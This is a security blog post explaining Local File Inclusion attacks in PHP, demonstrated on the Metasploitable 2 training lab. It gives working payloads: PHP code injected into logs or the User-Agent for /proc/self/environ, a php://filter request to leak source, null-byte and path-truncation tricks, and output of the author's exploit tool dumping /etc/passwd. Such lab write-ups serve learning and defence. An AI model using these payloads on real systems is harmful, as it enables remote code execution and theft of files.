Hello,

Today, I played a bit with Metasploitable 2. It is really easy to root, so that’s not the interest of this blog post.

Anyhow, I played a bit around and I ended up coding a basic LFI exploit tool.

So yet another post on LFI exploitation …

So what is LFI?

LFI stands for Local File Inclusion. It is a vulnerability that allows you to include local files. Many people do think that it’s not really dangerous as it only includes LOCAL files. Unfortunately (depending on which side of the barrier you are …), it is false, you can execute code through a LFI.

So, how do you exploit it?

By including local files. Yes, local files :).

These are the well-known techniques for LFI:

  • apache logs
  • /proc/self/environ
  • php://input
  • NULL Byte Injection
  • path truncation
  • directory traversal
  • PHP filters
  • image inclusion with PHP code

Apache logs

These were publicly accessible in old distros. Now, these are only readable by proper users.

You’d basically inject PHP Code through a GET request:

1
http://victim/<?php system ('id'); ?>

This would leave PHP code in the logs.

Then executing the PHP code is as simple as:

1
http://victim/?page=/var/log/apache2/access_log

Code execution if there is no proper rights on the logs (some old systems remain).

/proc/self/environ

This file is interesting as it stores stuffs like your USER-AGENT and whatsoever.

So, if you change your User-Agent to

1
<?php system ('id'); ?>

and use this:

1
http://victim/?page=/proc/self/environ

Yes, code execution!

php://input

Ok, this one execute PHP Code included into the POST DATA.

NULL byte injection and path truncation

This one is pretty neat. Say you have the following code:

1
<?php include ($_GET['page'] . '.php'); ?>

Well, you can get rid of the ‘.php’ extension using that trick. Just append %00 or looooooots of . or /., this will get normalized and voila no more extension. NULL Byte poisoning doesn’t work for PHP >= 5.3.4 as it’s been fixed.

Reverse path truncation is mostly the same, just the ../ is before the file name.

PHP filters

This technique is mainly for leaking files (.php and others).

This doesn’t work if you have a prefix such as here:

1
<?php include ($prefix + $_GET['page'] + '.php'); ?>

You exploit it using this request for instance:

1
http://victim/?page=php://filter/read=convert.base64-encode/resource=index.php

As you guessed, the PHP filter is

1
php://filter/read=convert.base64-encode/resource=

image with PHP code

This one is about appending PHP code in an image. Using the image in the LFI allows you to inject PHP code : the PHP interpreter interprets anything as code as long as it’s in .

If you have a non exploitable LFI with /proc/self/environ or apaches logs and you don’t have an extension concatenation, this can allow you to exploit it if you are able to upload images.

Let’s say you have PHPBB and PhpLdapAdmin 1.1.0.5.

Well, you can upload an image using PHPBB then exploit the LFI in PhpLdapAdmin using the directory traversal trick => code execution.

Exploit

I wrote a basic LFI exploiter that uses PHP filter or /proc/self/environ tricks.

You can get it at LFI exploit tool.

The code isn’t clean and it needs tons of improvement before being really a usable tool. I plan on improving it on a need to basis. The cookie functionality is not implemented yet, it is just a placeholder for now.

You can test it on multilidae on Metasploitable 2. I haven’t tested it somewhere else yet.

Example of utilisation (this is on metasploitable 2):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
$ ./exploit-lfi.py -h
usage: exploit-lfi.py [-h] --url URL [--action ACTION] --option OPTION
                      [--replace REPLACE] [--cookie COOKIE]

Exploit LFI

optional arguments:
  -h, --help            show this help message and exit
  --url URL, -u URL     URL to attack
  --action ACTION, -a ACTION
                        exec or read (default)
  --option OPTION, -o OPTION
                        Action argument
  --replace REPLACE, -r REPLACE
                        string to replace
  --cookie COOKIE, -c COOKIE
                        Cookie
$ ./exploit-lfi.py -u 'http://192.168.56.107/mutillidae/index.php?page=show-log.php' -o 'cat /etc/passwd'
[+] Checking vulnerability
Test url : http://192.168.56.107/mutillidae/index.php?page=whatever&
Is vulnerable with param page!
[+] Found vulnerability, new URL : http://192.168.56.107/mutillidae/index.php?page=PAYLOAD&
[+] Searching for root path
root : ../../../
[+] New URL : http://192.168.56.107/mutillidae/index.php?page=../../../PAYLOAD&
[+] Testing : {'path': '/proc/self/environ', 'type': 'header'}
    http://192.168.56.107/mutillidae/index.php?page=../../..//proc/self/environ&
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false 

Conclusion

As you can see in this introduction, code execution is quite possible with a LFI. These aren’t only information leaks vulnerabilities.

That’s all for today.

Cheers,

m_101

Updates - 18/12/2013 : the LFI exploit tool I wrote has been moved to its own repository : https://github.com/m101/lfipwn/ and cookie functionality does work.

Resources